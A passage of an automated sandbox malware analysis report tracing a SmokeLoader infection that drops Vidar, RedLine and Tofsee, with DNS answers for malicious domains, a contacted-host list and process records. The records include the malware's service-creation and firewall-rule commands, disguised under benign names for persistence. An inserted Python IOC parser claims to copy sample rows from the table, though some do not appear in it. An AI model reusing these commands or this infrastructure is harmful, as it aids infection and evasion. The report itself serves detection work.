                                                                              Jan 11, 2022 20:45:10.379168034 CET8.8.8.8192.168.2.40x5821No error (0)amogohuigotuli.at118.33.109.122A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:10.379168034 CET8.8.8.8192.168.2.40x5821No error (0)amogohuigotuli.at180.69.193.102A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:10.379168034 CET8.8.8.8192.168.2.40x5821No error (0)amogohuigotuli.at5.163.255.148A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:10.379168034 CET8.8.8.8192.168.2.40x5821No error (0)amogohuigotuli.at110.14.121.125A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:10.379168034 CET8.8.8.8192.168.2.40x5821No error (0)amogohuigotuli.at175.119.10.231A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:10.379168034 CET8.8.8.8192.168.2.40x5821No error (0)amogohuigotuli.at116.58.10.58A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:10.379168034 CET8.8.8.8192.168.2.40x5821No error (0)amogohuigotuli.at211.119.84.111A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:10.686182022 CET8.8.8.8192.168.2.40x9d57No error (0)microsoft-com.mail.protection.outlook.com104.47.54.36A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:10.686182022 CET8.8.8.8192.168.2.40x9d57No error (0)microsoft-com.mail.protection.outlook.com40.93.207.1A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:10.686182022 CET8.8.8.8192.168.2.40x9d57No error (0)microsoft-com.mail.protection.outlook.com52.101.24.0A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:10.686182022 CET8.8.8.8192.168.2.40x9d57No error (0)microsoft-com.mail.protection.outlook.com40.93.207.0A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:10.686182022 CET8.8.8.8192.168.2.40x9d57No error (0)microsoft-com.mail.protection.outlook.com40.93.212.0A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:10.686182022 CET8.8.8.8192.168.2.40x9d57No error (0)microsoft-com.mail.protection.outlook.com104.47.53.36A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:15.369031906 CET8.8.8.8192.168.2.40x6d85No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                              Jan 11, 2022 20:45:15.455390930 CET8.8.8.8192.168.2.40x7f0dNo error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                              Jan 11, 2022 20:45:15.845935106 CET8.8.8.8192.168.2.40x9971No error (0)iplogger.org148.251.234.83A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:16.711029053 CET8.8.8.8192.168.2.40x3e8cNo error (0)a0620531.xsph.ru141.8.192.58A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:19.249967098 CET8.8.8.8192.168.2.40xb587No error (0)dl.uploadgram.me176.9.247.226A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:19.832565069 CET8.8.8.8192.168.2.40x7534No error (0)patmushta.info8.209.79.15A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:21.011390924 CET8.8.8.8192.168.2.40xb0abNo error (0)a0620531.xsph.ru141.8.192.58A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:31.416764975 CET8.8.8.8192.168.2.40x472dNo error (0)yandex.ru5.255.255.50A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:31.416764975 CET8.8.8.8192.168.2.40x472dNo error (0)yandex.ru5.255.255.60A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:31.416764975 CET8.8.8.8192.168.2.40x472dNo error (0)yandex.ru77.88.55.50A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:31.416764975 CET8.8.8.8192.168.2.40x472dNo error (0)yandex.ru77.88.55.66A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:33.985415936 CET8.8.8.8192.168.2.40xf407No error (0)a0620531.xsph.ru141.8.192.58A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:46:10.008888006 CET8.8.8.8192.168.2.40x8403No error (0)patmushta.info8.209.79.15A (IP address)IN (0x0001)

                                                                              HTTP Request Dependency Graph

                                                                              • pggcfgsws.org
                                                                                • host-data-coin-11.com
                                                                              • gmfjy.net
                                                                              • vvrpud.org
                                                                              • plegf.org
                                                                              • yntwh.org
                                                                              • jdeywcw.net
                                                                              • yxsry.com
                                                                              • ewylxqujhk.org
                                                                              • data-host-coin-8.com
                                                                              • suliahofuf.com
                                                                              • hadtpjchr.com
                                                                              • horjbqmq.com
                                                                              • esvymsmvx.com
                                                                              • vqxvg.org
                                                                              • unicupload.top
                                                                              • unjcuxt.org
                                                                              • xuffstxn.org
                                                                              • rnopvq.net
                                                                              • lwdprkm.net
                                                                              • bnqqs.org
                                                                              • imncgs.com
                                                                              • ipbucsran.org
                                                                              • bvfkxysv.com
                                                                              • 185.7.214.171:8080
                                                                              • tomtpsvfw.org
                                                                              • gwajgepq.net
                                                                              • hqfldvwwlo.net
                                                                              • jhxpljskoo.org
                                                                              • qseyddwdi.org
                                                                              • ugynawfq.net
                                                                              • pqaspb.org
                                                                              • nkqvrbje.com
                                                                              • tceeer.com
                                                                              • rvjlsh.net
                                                                              • rxaefwr.org
                                                                              • igvekrqlt.net
                                                                                • amogohuigotuli.at
                                                                              • chuxidlayb.net
                                                                              • vgrvqyptj.org
                                                                              • cbqys.org
                                                                              • xtjppnbp.net
                                                                              • wkuthbgxw.com
                                                                              • upcunwrd.org
                                                                              • gaspj.net
                                                                              • nwxnrl.org
                                                                              • iwxef.net
                                                                              • sygdrk.org
                                                                              • npsrffrpxb.org
                                                                              • eqqeihdtfd.com
                                                                              • holwhrfuq.org
                                                                              • dnaye.net
                                                                              • nycnks.com
                                                                              • tpole.com
                                                                              • 185.163.204.22
                                                                              • kfxeicq.net
                                                                              • 185.163.204.24
                                                                              • wsnlxaykp.org
                                                                              • rwhbdb.com
                                                                              • ifihkt.net
                                                                              • qtvebqyko.net
                                                                              • vvqho.com
                                                                              • lmhfhgftt.org
                                                                              • unic11m.top
                                                                              • iilwqqrr.net
                                                                              • bjhri.com
                                                                              • wanghml.org
                                                                              • nebtobstfs.org
                                                                              • ivgwjg.com
                                                                              • enxrrgsqu.org
                                                                              • 78.46.160.87
                                                                              • ofxlqqbqej.org
                                                                              • ytdefkxsg.com
                                                                              • vnrbprjedc.org
                                                                              • a0620531.xsph.ru
                                                                              • gjxtjba.org
                                                                              • garlvmrpv.com
                                                                              • pagwfnjr.net
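The DNS Answers table above and the HTTP Request Dependency Graph host list are the two places in this report from which network indicators are pulled. The following is an added example, not code from the report or from Joe Security: a parser for the DNS Answers rows as they come out of a plain-text export (column values fused together with no separator), a reduction of the parsed rows to a name-to-address IOC map, and a cross-check that lists dependency-graph hosts with no DNS answer among the rows it is given. Assumptions not stated on the page: the fused source/destination address pair is disambiguated against the analysis environment's own addresses, which are taken here from this report (8.8.8.8 as resolver, 192.168.2.4 as guest), and the sample rows and host names embedded in the block are copied from the two sections above.

```python
"""Parse flattened Joe Sandbox 'DNS Answers' rows into records and reduce them to a
name -> resolved-address IOC map. Added example; not code from the report or from
Joe Security. A text export fuses the columns with no separator, so the resolver and
guest addresses run together ('8.8.8.8192.168.2.4'); they are split by anchoring on
the analysis environment's addresses, assumed from this report (8.8.8.8, 192.168.2.4)."""
from __future__ import annotations
import re
from dataclasses import dataclass

IPV4 = r"(?:\d{1,3}\.){3}\d{1,3}"
# Column order: Timestamp, Source IP, Dest IP, Trans ID, Reply Code, Name, CName, Type, Class.
ROW_RE = re.compile(
    r"(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2}\.\d+ [A-Z]{3,4})"
    rf"(?P<ips>{IPV4}{IPV4})"              # source + destination, fused
    r"(?P<txid>0x[0-9a-fA-F]{1,4})"        # 16-bit DNS transaction ID
    r"(?P<rcode>[A-Za-z ]+\(\d+\))"        # e.g. 'No error (0)'
    r"(?P<payload>.+?)"                    # Name + CName, fused
    r"(?P<rtype>[A-Z]+) \([^)]*\)"         # 'A (IP address)' / 'CNAME (Canonical name)'
    r"IN \(0x[0-9a-fA-F]+\)$")

@dataclass(frozen=True)
class DnsAnswer:
    timestamp: str
    src: str
    dst: str
    txid: int
    rcode: str
    name: str
    data: str | None      # resolved IPv4 for A records, target name for CNAME
    rtype: str            # 'A' or 'CNAME'
    ambiguous: bool       # True when the Name/CName boundary could not be recovered

def is_ipv4(s: str) -> bool:
    parts = s.split(".")
    return len(parts) == 4 and all(p.isdigit() and len(p) <= 3 and int(p) <= 255 for p in parts)

def split_fused_ips(fused: str, endpoints: tuple[str, ...]) -> tuple[str, str]:
    """'8.8.8.8192.168.2.4' is also a valid ('8.8.8.81', '92.168.2.4'): the split that
    matches the most known endpoints wins, and a tie is an error rather than a guess."""
    def score(c: tuple[str, str]) -> int:
        return (c[0] in endpoints) + (c[1] in endpoints)
    cands = [(fused[:i], fused[i:]) for i in range(7, len(fused) - 6)
             if is_ipv4(fused[:i]) and is_ipv4(fused[i:])]
    cands.sort(key=score, reverse=True)
    if not cands or (len(cands) > 1 and score(cands[0]) == score(cands[1])):
        raise ValueError(f"cannot split fused address pair {fused!r}")
    return cands[0]

def split_payload(payload: str, rtype: str) -> tuple[str, str | None, bool]:
    """Recover (name, data, ambiguous) from the fused Name+CName text."""
    if rtype == "A":
        # Every suffix that is a valid IPv4 is a candidate boundary; prefer the one whose
        # name does not end in a digit. A name that really ends in a digit abutting the
        # address is not recoverable from a flattened export; the row is flagged only
        # when no letter-terminated split exists at all.
        splits = [i for i in range(1, len(payload)) if is_ipv4(payload[i:])]
        if not splits:
            return payload, None, True
        clean = [i for i in splits if not payload[i - 1].isdigit()]
        i = clean[0] if clean else splits[0]
        return payload[:i], payload[i:], not clean
    if rtype == "CNAME":
        # Common case: the target starts with the queried name
        # ('api.ip.sb' -> 'api.ip.sb.cdn.cloudflare.net'); anything else stays unsplit.
        for i in range(1, len(payload)):
            head = payload[:i]
            if "." in head and payload[i:].startswith(head + "."):
                return head, payload[i:], False
    return payload, None, True

def parse_rows(text: str, endpoints: tuple[str, ...] = ("8.8.8.8", "192.168.2.4")) -> list[DnsAnswer]:
    out: list[DnsAnswer] = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue  # blank line, table header, or a row the pattern cannot read
        src, dst = split_fused_ips(m["ips"], endpoints)
        name, data, amb = split_payload(m["payload"], m["rtype"])
        out.append(DnsAnswer(m["ts"], src, dst, int(m["txid"], 16), m["rcode"], name, data, m["rtype"], amb))
    return out

def ioc_map(answers: list[DnsAnswer]) -> dict[str, list[str]]:
    """name -> resolved IPv4s, from successful A answers only (CNAME targets are not addresses)."""
    acc: dict[str, set[str]] = {}
    for a in answers:
        if a.rtype == "A" and a.rcode.startswith("No error") and a.data:
            acc.setdefault(a.name, set()).add(a.data)
    return {n: sorted(v, key=lambda ip: tuple(map(int, ip.split(".")))) for n, v in acc.items()}

def names_without_answer(hosts: list[str], answers: list[DnsAnswer]) -> list[str]:
    """Dependency-graph hosts with no DNS answer among the rows given (port suffixes dropped)."""
    answered = {a.name for a in answers}
    return sorted(h for h in (x.split(":")[0] for x in hosts) if h not in answered and not is_ipv4(h))

# Rows copied from the DNS Answers table above, in the fused form of a text export.
SAMPLE_ROWS = """
Jan 11, 2022 20:44:51.385624886 CET8.8.8.8192.168.2.40x644eNo error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
Jan 11, 2022 20:44:51.455044031 CET8.8.8.8192.168.2.40x897fNo error (0)amogohuigotuli.at61.98.7.133A (IP address)IN (0x0001)
Jan 11, 2022 20:44:51.455044031 CET8.8.8.8192.168.2.40x897fNo error (0)amogohuigotuli.at118.33.109.122A (IP address)IN (0x0001)
Jan 11, 2022 20:45:00.544269085 CET8.8.8.8192.168.2.40x89f2No error (0)bit.ly67.199.248.11A (IP address)IN (0x0001)
Jan 11, 2022 20:45:00.544269085 CET8.8.8.8192.168.2.40x89f2No error (0)bit.ly67.199.248.10A (IP address)IN (0x0001)
Jan 11, 2022 20:45:15.369031906 CET8.8.8.8192.168.2.40x6d85No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
"""
# Hosts copied from the HTTP Request Dependency Graph above (one carries a port).
SAMPLE_HTTP_HOSTS = ["pggcfgsws.org", "host-data-coin-11.com", "amogohuigotuli.at", "185.7.214.171:8080"]
```

`names_without_answer` only knows the rows it is handed; to decide which dependency-graph hosts were never resolved during the run, feed it the whole exported table rather than the excerpt embedded here. Where the Name/CName boundary matters (a name ending in a digit directly followed by the address), work from the structured HTML or JSON report instead of a flattened export, since `ambiguous` can only flag the cases where no plausible split exists.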

                                                                              Code Manipulations

                                                                              Statistics

                                                                              Behavior

                                                                              System Behavior

                                                                              General

Start time: 20:43:00
Start date: 11/01/2022
Path: C:\Users\user\Desktop\V91yW08J6p.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\V91yW08J6p.exe"
Imagebase: 0x400000
File size: 284672 bytes
MD5 hash: D609A21245D77DCCD6D4A659CBD9466A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

                                                                              General

Start time: 20:43:02
Start date: 11/01/2022
Path: C:\Users\user\Desktop\V91yW08J6p.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\V91yW08J6p.exe"
Imagebase: 0x400000
File size: 284672 bytes
MD5 hash: D609A21245D77DCCD6D4A659CBD9466A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000002.00000002.737039163.0000000000460000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000002.00000002.738316434.0000000002091000.00000004.00020000.sdmp, Author: Joe Security
Reputation: low

                                                                              General

                                                                              Start time:20:43:09
                                                                              Start date:11/01/2022
                                                                              Path:C:\Windows\explorer.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\Explorer.EXE
                                                                              Imagebase:0x7ff6fee60000
                                                                              File size:3933184 bytes
                                                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000003.00000000.722834578.0000000004F01000.00000020.00020000.sdmp, Author: Joe Security
                                                                              Reputation:high

                                                                              General

                                                                              Start time:20:43:46
                                                                              Start date:11/01/2022
                                                                              Path:C:\Users\user\AppData\Roaming\adiicvb
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Roaming\adiicvb
                                                                              Imagebase:0x400000
                                                                              File size:284672 bytes
                                                                              MD5 hash:D609A21245D77DCCD6D4A659CBD9466A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              Reputation:low

                                                                              General

                                                                              Start time:20:43:49
                                                                              Start date:11/01/2022
                                                                              Path:C:\Users\user\AppData\Roaming\adiicvb
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Roaming\adiicvb
                                                                              Imagebase:0x400000
                                                                              File size:284672 bytes
                                                                              MD5 hash:D609A21245D77DCCD6D4A659CBD9466A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.788360446.0000000001F51000.00000004.00020000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.788330206.0000000001F30000.00000004.00000001.sdmp, Author: Joe Security
                                                                              Reputation:low

                                                                              General

                                                                              Start time:20:43:57
                                                                              Start date:11/01/2022
                                                                              Path:C:\Users\user\AppData\Local\Temp\7CCD.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Local\Temp\7CCD.exe
                                                                              Imagebase:0x400000
                                                                              File size:301056 bytes
                                                                              MD5 hash:277680BD3182EB0940BC356FF4712BEF
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000002.807939940.00000000005B0000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000002.808518584.00000000021B1000.00000004.00020000.sdmp, Author: Joe Security
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              Reputation:moderate

                                                                              General

                                                                              Start time:20:44:03
                                                                              Start date:11/01/2022
                                                                              Path:C:\Users\user\AppData\Local\Temp\76E7.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Local\Temp\76E7.exe
                                                                              Imagebase:0x400000
                                                                              File size:312320 bytes
                                                                              MD5 hash:2AE79DF2C51EF858F5483314B6B83FA0
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.809805582.0000000000548000.00000004.00000020.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000008.00000002.809805582.0000000000548000.00000004.00000020.sdmp, Author: Joe Security
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              Reputation:low

                                                                              General

                                                                              Start time:20:44:06
                                                                              Start date:11/01/2022
                                                                              Path:C:\Users\user\AppData\Local\Temp\6902.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Local\Temp\6902.exe
                                                                              Imagebase:0x400000
                                                                              File size:298496 bytes
                                                                              MD5 hash:F4C254B2556531003266AF2D9D74B625
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000000B.00000003.814707254.0000000000600000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000000B.00000002.840468381.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000000B.00000002.840877989.00000000005E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              Reputation:low

                                                                              General

                                                                              Start time:20:44:10
                                                                              Start date:11/01/2022
                                                                              Path:C:\Users\user\AppData\Local\Temp\768F.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Local\Temp\768F.exe
                                                                              Imagebase:0x2c0000
                                                                              File size:537088 bytes
                                                                              MD5 hash:D7DF01D8158BFADDC8BA48390E52F355
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:.Net C# or VB.NET
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000D.00000002.868605208.00000000036C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000D.00000002.869195852.0000000003831000.00000004.00000001.sdmp, Author: Joe Security
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Avira
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              • Detection: 67%, ReversingLabs
                                                                              Reputation:moderate

                                                                              General

                                                                              Start time:20:44:14
                                                                              Start date:11/01/2022
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ejdjvovs\
                                                                              Imagebase:0x11d0000
                                                                              File size:232960 bytes
                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              General

                                                                              Start time:20:44:15
                                                                              Start date:11/01/2022
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff724c50000
                                                                              File size:625664 bytes
                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              General

                                                                              Start time:20:44:16
                                                                              Start date:11/01/2022
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\qxoxlxqh.exe" C:\Windows\SysWOW64\ejdjvovs\
                                                                              Imagebase:0x11d0000
                                                                              File size:232960 bytes
                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              General

                                                                              Start time:20:44:17
                                                                              Start date:11/01/2022
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff724c50000
                                                                              File size:625664 bytes
                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Start time:20:44:17
                                                                              Start date:11/01/2022
                                                                              Path:C:\Windows\SysWOW64\sc.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\System32\sc.exe" create ejdjvovs binPath= "C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe /d\"C:\Users\user\AppData\Local\Temp\6902.exe\"" type= own start= auto DisplayName= "wifi support
                                                                              Imagebase:0x20000
                                                                              File size:60928 bytes
                                                                              MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Start time:20:44:18
                                                                              Start date:11/01/2022
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff724c50000
                                                                              File size:625664 bytes
                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Start time:20:44:18
                                                                              Start date:11/01/2022
                                                                              Path:C:\Windows\SysWOW64\sc.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\System32\sc.exe" description ejdjvovs "wifi internet conection
                                                                              Imagebase:0x20000
                                                                              File size:60928 bytes
                                                                              MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Start time:20:44:19
                                                                              Start date:11/01/2022
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff724c50000
                                                                              File size:625664 bytes
                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Start time:20:44:19
                                                                              Start date:11/01/2022
                                                                              Path:C:\Windows\SysWOW64\sc.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\sc.exe" start ejdjvovs
                                                                              Imagebase:0x20000
                                                                              File size:60928 bytes
                                                                              MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Start time:20:44:20
                                                                              Start date:11/01/2022
                                                                              Path:C:\Users\user\AppData\Local\Temp\768F.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Users\user\AppData\Local\Temp\768F.exe
                                                                              Imagebase:0x360000
                                                                              File size:537088 bytes
                                                                              MD5 hash:D7DF01D8158BFADDC8BA48390E52F355
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Start time:20:44:20
                                                                              Start date:11/01/2022
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff724c50000
                                                                              File size:625664 bytes
                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Start time:20:44:21
                                                                              Start date:11/01/2022
                                                                              Path:C:\Windows\SysWOW64\netsh.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                              Imagebase:0x9f0000
                                                                              File size:82944 bytes
                                                                              MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Start time:20:44:21
                                                                              Start date:11/01/2022
                                                                              Path:C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe /d"C:\Users\user\AppData\Local\Temp\6902.exe"
                                                                              Imagebase:0x400000
                                                                              File size:13640704 bytes
                                                                              MD5 hash:EAE6D58C8C1CB389453AF3692BF58DA8
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000001A.00000002.850016785.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000001A.00000002.850501152.0000000000D50000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000001A.00000002.850539504.0000000000DB0000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000001A.00000003.846397330.0000000000D70000.00000004.00000001.sdmp, Author: Joe Security

                                                                              Disassembly

                                                                              Code Analysis
